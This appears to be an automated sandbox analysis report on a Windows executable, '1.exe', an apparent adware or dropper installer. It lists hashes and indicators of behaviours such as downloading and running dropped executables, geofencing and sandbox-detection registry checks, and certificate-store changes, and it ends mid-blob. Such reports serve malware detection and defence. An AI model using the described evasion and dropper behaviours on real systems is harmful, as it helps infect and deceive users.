Analysis
-
max time kernel
93s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
08/03/2025, 02:02
Static task
static1
Behavioral task
behavioral1
Sample
1.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1.exe
Resource
win10v2004-20250217-en
General
-
Target
1.exe
-
Size
32.8MB
-
MD5
c62c1a1a3c66fb83390ece675ab76dd2
-
SHA1
55b939abe9f03345c71f54ebe9a5f206bb64bc49
-
SHA256
de6ed44d21e5bc9bc5c1c51f33760a5d96378308d02c2c81ef2d75e7a201fb63
-
SHA512
b927f3bb27ae617c3a9e38bb2fecd1fc108cfa306408da657973a1e8ab3158a09b00285987acd0ef8ec14d2074d3bf485effd114ca3850ac820e01838e6a19c6
-
SSDEEP
786432:+Fxb8yuOgT5S+u6wrqImbWtVd5l5jMvti0Jz8+aZ8J9HZhkS3gXbwHPc:+Fxb8yuOgtO6oqIXtVd5l5jMvssz8T0G
Malware Config
Signatures
-
Downloads MZ/PE file 3 IoCs
flow pid Process 67 3588 MsiExec.exe 74 1380 MainSoftware.exe 80 5032 curl.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation 1.exe Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation MainSoftware.exe -
Executes dropped EXE 5 IoCs
pid Process 1684 MainSoftware.exe 1380 MainSoftware.exe 4212 SoftwareDistributor.exe 4228 Install.exe 2760 Install.exe -
Loads dropped DLL 21 IoCs
pid Process 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 532 MsiExec.exe 532 MsiExec.exe 532 MsiExec.exe 532 MsiExec.exe 532 MsiExec.exe 532 MsiExec.exe 532 MsiExec.exe 3588 MsiExec.exe 5060 regsvr32.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 67 3588 MsiExec.exe 70 3588 MsiExec.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: 1.exe File opened (read-only) \??\U: 1.exe File opened (read-only) \??\A: 1.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\O: 1.exe File opened (read-only) \??\X: 1.exe File opened (read-only) \??\G: 1.exe File opened (read-only) \??\N: 1.exe File opened (read-only) \??\Q: 1.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: 1.exe File opened (read-only) \??\K: 1.exe File opened (read-only) \??\V: 1.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\E: 1.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\V: 1.exe File opened (read-only) \??\P: 1.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\E: 1.exe File opened (read-only) \??\J: 1.exe File opened (read-only) \??\N: 1.exe File opened (read-only) \??\S: 1.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\A: 1.exe File opened (read-only) \??\L: 1.exe File opened (read-only) \??\I: 1.exe File opened (read-only) \??\L: 1.exe File opened (read-only) \??\W: 1.exe File opened (read-only) \??\W: 1.exe File opened (read-only) \??\Z: 1.exe File opened (read-only) \??\T: 1.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: 1.exe File opened (read-only) \??\Y: 1.exe File opened (read-only) \??\B: 1.exe File opened (read-only) \??\P: 1.exe File opened (read-only) \??\R: 1.exe File opened (read-only) \??\H: 1.exe File opened (read-only) \??\K: 1.exe File opened (read-only) \??\S: 1.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: 1.exe File opened (read-only) \??\G: 1.exe File opened (read-only) \??\J: 1.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Q: 1.exe File opened (read-only) \??\X: 1.exe File opened (read-only) \??\Z: 1.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\R: 1.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: 1.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: 1.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData MsiExec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12 MsiExec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12 MsiExec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8 MsiExec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8 MsiExec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft MsiExec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache MsiExec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content MsiExec.exe -
Drops file in Program Files directory 8 IoCs
description ioc Process File created C:\Program Files (x86)\Atomix\Addons\Surfclub\Surfclub.pkg.part MsiExec.exe File created C:\Program Files (x86)\Main\guid MainSoftware.exe File created C:\Program Files (x86)\Main\Chop\Install.exe MainSoftware.exe File created C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe msiexec.exe File created C:\Program Files (x86)\Atomix\Addons\Surfclub\How to uninstall.txt msiexec.exe File created C:\Program Files (x86)\Atomix\How to uninstall.txt msiexec.exe File created C:\Program Files (x86)\Main\MainSoftware.exe msiexec.exe File created C:\Program Files (x86)\Atomix\Addons\Surfclub\Install.exe.part MsiExec.exe -
Drops file in Windows directory 15 IoCs
description ioc Process File opened for modification C:\Windows\Installer\e586685.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI6A03.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{67AEF7BA-A109-4700-BE3F-0231069B1923} msiexec.exe File opened for modification C:\Windows\Installer\MSI7399.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7AF0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI679E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI687A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6927.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI76B7.tmp msiexec.exe File created C:\Windows\Installer\e586685.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI7773.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI789D.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000c9f51e24b17fce490000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000c9f51e240000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900c9f51e24000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dc9f51e24000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000c9f51e2400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Modifies data under HKEY_USERS 10 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" MsiExec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections SoftwareDistributor.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing MsiExec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E msiexec.exe -
Modifies system certificate store 2 TTPs 7 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 040000000100000010000000e94fb54871208c00df70f708ac47085b0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b81900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b4200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 1.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 5c0000000100000004000000001000001900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c040000000100000010000000e94fb54871208c00df70f708ac47085b200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1 1.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1\Blob = 0f0000000100000030000000ea09c51d4c3a334ce4acd2bc08c6a9be352e334f45c4fccfcab63edb9f82dc87d4bd2ed2fadae11163fb954809984ff153000000010000007e000000307c301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301f06092b06010401a032010230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000056000000305406082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d0020005200360000006200000001000000200000002cabeafe37d06ca22aba7391c0033d25982952c453647349763a3ab5ad6ccf697f0000000100000016000000301406082b0601050507030306082b06010505070309140000000100000014000000ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a01d0000000100000010000000521f5c98970d19a8e515ef6eeb6d48ef7a000000010000000c000000300a06082b060105050703097e00000001000000080000000080c82b6886d7010300000001000000140000008094640eb5a7a1ca119c1fddd59f810263a7fbd1200000000100000087050000308205833082036ba003020102020e45e6bb038333c3856548e6ff4551300d06092a864886f70d01010c0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3134313231303030303030305a170d3334313231303030303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820222300d06092a864886f70d01010105000382020f003082020a02820201009507e873ca66f9ec14ca7b3cf70d08f1b4450b2c82b448c6eb5b3cae83b841923314a46f7fe92accc6b0886bc5b689d1c6b2ff14ce511421ec4add1b5ac6d687ee4d3a1506ed64660b9280ca44de73944ef3a7897f4f786308c812506d42662f4db979284d521a8a1a80b719810e7ec48abc644c211c4368d73d3c8ac5b266d5909ab73106c5bee26d3206a61ef9b9ebaaa3b8bfbe826350d0f01889dfe40f79f5eaa21f2ad2702e7be7bc93bb6d53e2487c8c100738ff66b277617ee0ea8c3caab4a4f6f3954a12076dfd8cb289cfd0a06177c85874b0d4233af75d3acaa2db9d09de5d442d90f181cd5792fa7ebc50046334df6b9318be6b36b239e4ac2436b7f0efb61c135793b6deb2f8e285b773a2b835aa45f2e09d36a16f548af172566e2e88c55142441594eea3c538969b4e4e5a0b47f30636497730bc7137e5a6ec210875fce661163f77d5d99197840a6cd4024d74c014edfd39fb83f25e14a104b00be9feee8fe16e0bb208b36166096ab1063a659659c0f035fdc9da288d1a118770810aa89a751d9e3a8605009edb80d625f9dc059e27594c76395beaf9a5a1d8830fd1ffdf3011f985cf3348f5ca6d64142c7a584fd34b0849c595641a630e793df5b38cca58ad9c4245796e0e87195c54b165b6bf8c9bdc13e90d6fb82edc676ec98b11b584148a0019708379919791d41a27bf371e3207d814633c284caf0203010001a3633061300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0301f0603551d23041830168014ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0300d06092a864886f70d01010c050003820201008325ede8d1fd9552cd9ec004a09169e65cd084dedcada24fe84778d66598a95ba83c877c028ad16eb71673e65fc05498d574bec1cde21191ad23183ddde1724496b4955ec07b8e99781643135657b3a2b33bb577dc4072aca3eb9b353eb10821a1e7c443377932beb5e79c2c4cbc4329998e30d3ac21e0e31dfad80733765400222ab94d202e7068dae553fc835cd39df2ff440c4466f2d2e3bd46001a6d02ba255d8da13151dd54461c4ddb9996ef1a1c045ca615ef78e079fe5ddb3eaa4c55fd9a15a96fe1a6fbdf7030e9c3ee4246edc2930589fa7d637b3fd071817c00e898ae0e7834c325fbaf0a9f206bdd3b138f128ce2411a487a73a07769c7b65c7f82c81efe581b282ba86cad5e6dc005d27bb7eb80fe2537fe029b68ac425dc3eef5ccdcf05075d236699ce67b04df6e0669b6de0a09485987eb7b14607a64aa6943ef91c74cec18dd6cef532d8c99e15ef2723ecf54c8bd67eca40f4c45ffd3b93023074c8f10bf8696d9995ab499571ca4ccbb158953ba2c050fe4c49e19b11834d54c9dbaedf71faf24950478a803bbee81e5da5f7c8b4aa1907425a7b33e4bc82c56bdc7c8ef38e25c92f079f79c84ba742d6101207e7ed1f24f07595f8b2d4352eb460c94e1f566477977d5545b1fad2437cb455a4ea04448c8d8b099c5158409f6d64949c065b8e61a716ea0a8f182e8453e6cd602d70a6783055ac9a410 1.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1\Blob = 0400000001000000100000004fdd07e4d42264391e0c3742ead1c6ae0f0000000100000030000000ea09c51d4c3a334ce4acd2bc08c6a9be352e334f45c4fccfcab63edb9f82dc87d4bd2ed2fadae11163fb954809984ff153000000010000007e000000307c301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301f06092b06010401a032010230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000056000000305406082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d0020005200360000006200000001000000200000002cabeafe37d06ca22aba7391c0033d25982952c453647349763a3ab5ad6ccf697f0000000100000016000000301406082b0601050507030306082b06010505070309140000000100000014000000ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a01d0000000100000010000000521f5c98970d19a8e515ef6eeb6d48ef7a000000010000000c000000300a06082b060105050703097e00000001000000080000000080c82b6886d7010300000001000000140000008094640eb5a7a1ca119c1fddd59f810263a7fbd1190000000100000010000000cb9dd0fceaaa492f75ce292c21bbfbdd200000000100000087050000308205833082036ba003020102020e45e6bb038333c3856548e6ff4551300d06092a864886f70d01010c0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3134313231303030303030305a170d3334313231303030303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820222300d06092a864886f70d01010105000382020f003082020a02820201009507e873ca66f9ec14ca7b3cf70d08f1b4450b2c82b448c6eb5b3cae83b841923314a46f7fe92accc6b0886bc5b689d1c6b2ff14ce511421ec4add1b5ac6d687ee4d3a1506ed64660b9280ca44de73944ef3a7897f4f786308c812506d42662f4db979284d521a8a1a80b719810e7ec48abc644c211c4368d73d3c8ac5b266d5909ab73106c5bee26d3206a61ef9b9ebaaa3b8bfbe826350d0f01889dfe40f79f5eaa21f2ad2702e7be7bc93bb6d53e2487c8c100738ff66b277617ee0ea8c3caab4a4f6f3954a12076dfd8cb289cfd0a06177c85874b0d4233af75d3acaa2db9d09de5d442d90f181cd5792fa7ebc50046334df6b9318be6b36b239e4ac2436b7f0efb61c135793b6deb2f8e285b773a2b835aa45f2e09d36a16f548af172566e2e88c55142441594eea3c538969b4e4e5a0b47f30636497730bc7137e5a6ec210875fce661163f77d5d99197840a6cd4024d74c014edfd39fb83f25e14a104b00be9feee8fe16e0bb208b36166096ab1063a659659c0f035fdc9da288d1a118770810aa89a751d9e3a8605009edb80d625f9dc059e27594c76395beaf9a5a1d8830fd1ffdf3011f985cf3348f5ca6d64142c7a584fd34b0849c595641a630e793df5b38cca58ad9c4245796e0e87195c54b165b6bf8c9bdc13e90d6fb82edc676ec98b11b584148a0019708379919791d41a27bf371e3207d814633c284caf0203010001a3633061300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0301f0603551d23041830168014ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0300d06092a864886f70d01010c050003820201008325ede8d1fd9552cd9ec004a09169e65cd084dedcada24fe84778d66598a95ba83c877c028ad16eb71673e65fc05498d574bec1cde21191ad23183ddde1724496b4955ec07b8e99781643135657b3a2b33bb577dc4072aca3eb9b353eb10821a1e7c443377932beb5e79c2c4cbc4329998e30d3ac21e0e31dfad80733765400222ab94d202e7068dae553fc835cd39df2ff440c4466f2d2e3bd46001a6d02ba255d8da13151dd54461c4ddb9996ef1a1c045ca615ef78e079fe5ddb3eaa4c55fd9a15a96fe1a6fbdf7030e9c3ee4246edc2930589fa7d637b3fd0